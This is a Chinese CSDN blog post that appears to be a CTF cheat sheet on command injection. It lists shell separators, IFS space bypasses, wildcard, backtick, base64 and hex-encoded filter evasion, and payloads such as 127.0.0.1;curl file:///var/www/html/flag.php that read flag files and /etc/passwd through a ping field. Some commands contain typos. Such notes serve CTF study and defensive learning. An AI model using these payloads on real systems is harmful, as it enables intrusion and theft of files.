命令执行总结

最新推荐文章于 2024-07-29 22:18:31 发布
最新推荐文章于 2024-07-29 22:18:31 发布
阅读量83 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74989372/article/details/130534320
版权

命令执行漏洞不仅存在于B/S(客户端,如网页端淘宝)架构中,也存在于C/S(服务器,如手机版淘宝)架构中

经典场景为某网站给出了ping查询功能,此时便可采用127.0.0.1;ls的方式进行系统命令的输入,通常接cat flag.php进行文件查询

基本使用场景及利用方式就这些,主要是一些绕过知识点的串联及运用,以下将详细说明

管道符:  ;  |  ||  &  &&  %0a  %0d

空格:   $IFS$9  ${IFS}   >   <>   %09(php中常用)

关键字被过滤: 

        通配符绕过:  fl?g  f*g

        内联执行:  cat `ls`     (内联,就是将反引号内的内容作为输出进行执行)

        拼接:  127.0.0.1;a=fl;b=ag.php;cat $a$b

        替换cat:cat:由第一行开始显示内容,并将所有内容输出
                        tac:从最后一行倒序显示内容,并将所有内容输出
                        more:根据窗口大小,一页一页的现实文件内容
                        less:和 more 类似,但其优点可以往前翻页,而且进行可以搜索字符
                        head:只显示头几行
                        tail:只显示最后几行

                       (需注意:cat不能使用通配符进行替换)

                       (cat绕过:/bin/cat  或  c'a't 单引号绕过)

        编码绕过:echo Y2F0IGZhbGcucGhw|base64 -d|bash   (相当于cat flag.php)(过滤了bash还可以用sh)

                         $(printf “\x63\x61\x74\x20\x66\x6c\x61\x67\x2e\x70\x68\x70”)    (也相当于cat flag.php)

花式读文件(cat绕过):

        /bin/cat  或  c'a't 单引号绕过

        curl file://文件的绝对路径,如target=127.0.0.1;curl file :///var/www/html/flag.php

        文件的绝对路径查询方式:pwd

        长语句花哨读取:target=127.0.0.1;paste ./flag.php/etc/passwd 将flag和当前页面的php文件都打印出来(不实用);target=127.0.0.1;diff ./flag.php/etc/passwd(将结果进行对比,也不实用)

        冷门:target=127.0.0.1;od -a flag.php 以16进制的方式读取并解码(若不将参加参数-a则不会自动解码,直接以16进制的方式进行显示)

注意:在命令执行前需注意所读取文件的权限问题r、w、x三个组别,分别代表读、写、执行三个权限,权值分别为4、2、1

        ls -la查看文件权限

        Chmod 777 文件名 :提高文件权限

阿厂闯荡安全圈
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MSsql2005(Sa)权限执行命令总结.txt
07-18
### MSsql2005(Sa)权限执行命令总结 #### 概述 在Microsoft SQL Server 2005环境中,管理员级别的用户(通常指Sa用户)拥有对数据库服务器进行高级管理和配置的能力。本文档主要汇总了与Sa权限相关的执行命令,...
强大的shell命令总结
07-22
**: 重新执行上一个命令,并且以root权限运行。这对于需要提升权限才能执行的操作非常有用。 - 示例: 1. 输入 `apt-get install package` 而忘记添加 `sudo` 2. 使用 `sudo !!` 快速提升权限并重新执行命令。 ...
BUUCTF例题知识点(一)
2301_80911344的博客
04-22 617
”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。则b只会截取前面的整数部分。这里需要注意的是,当raw项为true时,返回的这个原始二进制不是普通的二进制(0,1),而是 'or'6\xc9]\x99\xe9!.32位16进制字符串的意思是:将MD5加密得到的128 位长度的"指纹信息",以每4位为一组,分为32组,每组以转换为16进制,进行转换得到一个32位的字符串。
BUUCTF-[GXYCTF2019] Ping Ping Ping
lunan的博客
05-15 973
BUUCTF-[GXYCTF2019] Ping Ping Ping 考点: 1、命令联合执行 2、命令绕过空格的方法 3、内联执行 一、命令联合执行 ; 前面的执行执行后面的 | 管道符,上一条命令的输出,作为下一条命令的参数(显示后面的执行结果) || 当前面的执行出错时(为假)执行后面的 & 将任务置于后台执行 && 前面的语句为假则直接出错,后面的也不执行,前面只能为真 %0a (换行) %0d (回车) 二、命令绕过空格的方法
CTF-命令执行部分总结
weixin_44770698的博客
05-29 1705
因为自己是小白,还是想着尽量快一点的学习到许多知识,最近又做了CTFshow里面的部分萌新题,这里总结一下其中的部分萌新WEB题。 web 9 要求我们使用GET方式传入c参数,参数中还要匹配到system或者exec等关键字,这里算是一个小坑,还以为是不能有这些关键字,还尝试了passthru、和拼接绕过......很尴尬。 这个比较简单我们使用system来执行查看config.php就可以了。 web 10 这个题的含义就是正则匹配到system、exec等,则会提示你cmd e
Linux常用命令总结
qq_45704528的博客
08-15 3万+
Linux常用命令总结 目录Linux常用命令总结服务器关机相关命令2.系统目录结构介绍3.文件操作相关命令4.文件的基本属性5.文件的内容查看6.Vim7.进程相关命令 服务器关机相关命令 关机指令为:shutdown ; sync # 将数据由内存同步到硬盘中。 shutdown # 关机指令,你可以man shutdown 来看一下帮助文档。例如你可以运行如下命令关机: shutdown –h 10 # 这个命令告诉大家,计算机将在10分钟后关机 shutdown –h now # 立马关机
linux后台运行命令总结
abc
08-19 6301
但万一网络不好,(比如我这儿的破校园网,高峰时几秒钟断一次),终端突然和服务器之间的连接断了,那脚本就会自动停了(因为运行test.sh进程的父进程就是当前的shell终端进程,关闭当前shell终端时,父进程退出,会发送hangup信号给所有子进程,子进程收到hangup以后也会退出)。nohup:不挂断的运行,注意并没有后台运行的功能,就是指用nohup运行命令可以使命令永久的执行下去,和用户终端没有关系,例如我们断开SSH连接都不会影响他的运行,注意了nohup没有后台运行的意思;
批量执行redis命令总结
w727655308的博客
09-07 592
redis 批量操作 批量执行命令
Docker常用命令总结
热门推荐
m0_62946761的博客
02-16 3万+
docker常用命令解释及总结,简洁明了,清晰易懂
命令注入总结
weixin_44576725的博客
12-15 6480
文章目录命令注入总结原理常见的危险函数PHPsystemexecpassthrushell_execpopenproc_open反引号Pythonsystempopensubprocess.call/subprocess.runspawnJavajava.lang.Runtime.getRuntime().exec(command)Linux下常用的符号特殊符号通配符常用绕过命令分隔与执行多条命令空格绕过绕过 escapeshellcmd黑名单绕过无参数rce过滤字母或数字常用读取文件方式常用读取目录方式利
命令执行Webshell总结
hackzkaq的博客
07-20 4900
更多渗透技能 ,10余本电子书及渗透工具包,搜公众号:白帽子左一 前言 当我们找到一个rce漏洞却无法反弹shell时,在web路径写webshell用连接工具进行管理会方便的多,本文总结命令执行webshell的流程化操作。 寻找web路径 写webshell当然要写在web路径,第一步要做的就是快速寻找web路径 1.文件查找法 一般web路径一定会有index.html\php\jsp\asp,login.xxx文件。可以根据已知页面文件名全局搜索 linux: find / -name ind
ch376命令总结和手册_ch376命令总结_
10-02
本篇文章将深入探讨`ch376`命令总结及其应用。 首先,我们来看`ch376`的基本功能。这个工具主要用于检查和操作基于CH376芯片的U盘设备。CH376芯片是一款由芯邦科技(Chipsea Technologies)设计的USB接口控制器,...
开始运行命令总结
08-18
1. `cmd`:打开命令提示符,可以执行各种DOS命令。 2. `control`:打开控制面板,进行系统设置。 3. `msconfig`:打开系统配置实用程序,用于管理启动项、服务等。 4. `notepad`:启动记事本,编辑文本文件。 5. `%...
Linux常用命令及实用命令万字总结.doc
07-21
* which命令:用于查找可执行文件。 5. 系统管理命令 * shutdown命令:用于关机或重启系统。 * reboot命令:用于重启系统。 * init命令:用于更改系统的运行级别。 这些命令只是Linux系统中的一部分,都是 Linux ...
网安零基础入门神书,全面介绍Web渗透核心攻击与防御方式!
最新发布
互联网架构小马的博客
07-29 771
Web安全是指Web服务程序的漏洞,通常涵盖Web漏洞、操作系统洞、数据库漏洞、中间件漏洞等。“渗透测试”作为主动防御的一种关键手段,对评估网络系统安全防护及措施至关重要,因为只有发现问题才能及时终止并预防潜在的安全风险。根据网络安全调查统计,75%的网络攻击行为都是来自Web应用层面而非网络层面所以,学习Web安全的重要性不言而喻。Web安全吸引越来越多的人学习,有人是被其炫酷感染,有人是出于对技术的热爱,但大多数人还是为了高薪资和职场发展。
WEB安全】 PHP基础与数据库教学下(超详细)
weixin_60838266的博客
07-29 1030
PHP 连接 MySQL在 PHP 使用 MySQL 数据库前,你需要先将它们连接。PHP 5 及以上版本建议使用以下方式连接 MySQL :MySQLi extension ("i" 意为 improved)在 PHP 早起版本中我们使用 MySQL 扩展。但该扩展在 2012 年开始不建议使用。我是该用 MySQLi ,还是 PDO?如果你需要一个简短的回答,即 "你习惯哪个就用哪个"。
网络安全之扫描探测阶段攻防手段(二)
子非渔
07-24 867
扫描探测阶段是攻击者对目标网络进行深入了解的关键步骤,同时也是防御者识别潜在威胁和加强安全防护的机会。
WEB安全】 PHP基础完整教学上(超详细)
weixin_60838266的博客
07-28 748
本文为Web安全学习中需要了解的php知识提高学习,PHP:Hypertext Preprocessor,中文名:“超文本预处理器”是一种通用开源脚本语言。语法吸收了C语言、java和Perl的特点,利于学习,使用广泛,主要适用于web开发领域。用PHP做出的动态页面与其他的编程语言相比,PHP是将程序嵌入到HTML(标准通用标记语言下的一个应用)文档中去执行执行效率比完全生成HTML标记的CGI要高许多;PHP还可以执行编译后代码,编译可以达到加密和优化代码运行,使代码运行更快。
MATLAB常用命令和函数总结
* `Ctrl+C`:中断正在执行命令。 二、函数及运算 MATLAB提供了丰富的函数和运算符,用于进行科学计算和数据分析。常用的运算符包括: * `+`:加。 * `-`:减。 * `*`:乘。 * `/`:除。 * `\`:左除。 * `^`:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值